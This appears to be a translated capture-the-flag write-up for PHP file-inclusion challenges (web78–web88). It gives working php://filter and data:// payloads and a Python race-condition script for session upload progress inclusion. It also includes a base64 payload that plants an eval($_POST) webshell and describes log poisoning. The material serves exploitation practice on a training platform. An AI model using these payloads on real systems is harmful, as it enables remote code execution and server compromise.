Article Directory
WEB78
Nothing to talk about
payload:?file=php://filter/read=convert.base64-encode/resource=falg.php
web79
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
Let's take a look at the source code first. The previous payload is no longer available, because PHP is filtered, so here we directly change the method. Reference article: https://www.freebuf.com/column/148886.html
uses this sentence
payload:?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
Found that it can be executed, then we execute another command to execute it.
There is a pitfall here, that is, the label cannot be closed. <?php system('cat flag.php');
payload:?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
web80
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
Reference article locally included
Log getshell
Capture packet to change user_Agent
ant sword connection
It is not possible to use include between data protocols, you need to bypass open_basedir
Reference link php pseudo-protocol to realize the seven postures of command execution
/var/log/nginx/access.log
web81
The same as 80 is also included in the log.
web82_86
Kill the script directly
import io
import requests
import threading
sessID = 'flag'
url = 'http://296b5d26-334c-4459-b7a6-b16db5aad264.challenge.ctf.show:8080/'
# 1.设置信号
# 使用Event的set()方法可以设置Event对象内部的信号标志为真。Event对象提供了isSet()方法来判断其内部信号标志的状态,当使用event对象的set()方法后,isSet()方法返回真.
def write(session):
while event.isSet():
f = io.BytesIO(b'a' * 1024 * 50)
response = session.post(
url,
cookies={
'PHPSESSID': sessID},
data={
'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("cat *.php");?>'},
files={
'file': ('test.txt', f)}
)
def read(session):
while event.isSet():
response = session.get(url + '?file=/tmp/sess_{}'.format(sessID))
if 'test' in response.text:
print(response.text)
event.clear()
else:
print('[*]retrying...')
if __name__ == '__main__':
event = threading.Event()
event.set()
with requests.session() as session:
for i in range(1, 30):
threading.Thread(target=write, args=(session,)).start()
for i in range(1, 30):
threading.Thread(target=read, args=(session,)).start()
WEB87
Reference link
Different variables die to bypass.
if(isset($_GET['file'])){
$file = $_GET['file'];
$content = $_POST['content'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);
}else{
highlight_file(__FILE__);
}
Base64 can be bypassed/it
happens that phpdie is exactly 6 bytes, plus 2 is a multiple of 4, which can be decoded by bse64.
Construct
php://filter/write=convert.base64-decode/resource=1.php
url after encoding twice
payload
file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30
content=aaPD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg==
The use
of php://filter, talk about the magic of php://filter
web88
if(isset($_GET['file'])){
$file = $_GET['file'];
if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
die("error");
}
include($file);
}else{
highlight_file(__FILE__);
}
1. Filtered. File pseudo-protocol cannot be used.
2. Filtered. php php:// protocol cannot be used.
3. I don’t know the absolute path zip:// & bzip2:// & zlib:// protocol
4. No filtering.\ \ You can use the data:// protocol
payload (remember to delete the = sign because it is filtered)
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZionKTsgPz4
The reference article uses the data pseudo protocol to bypass the parentheses and backticks to be filtered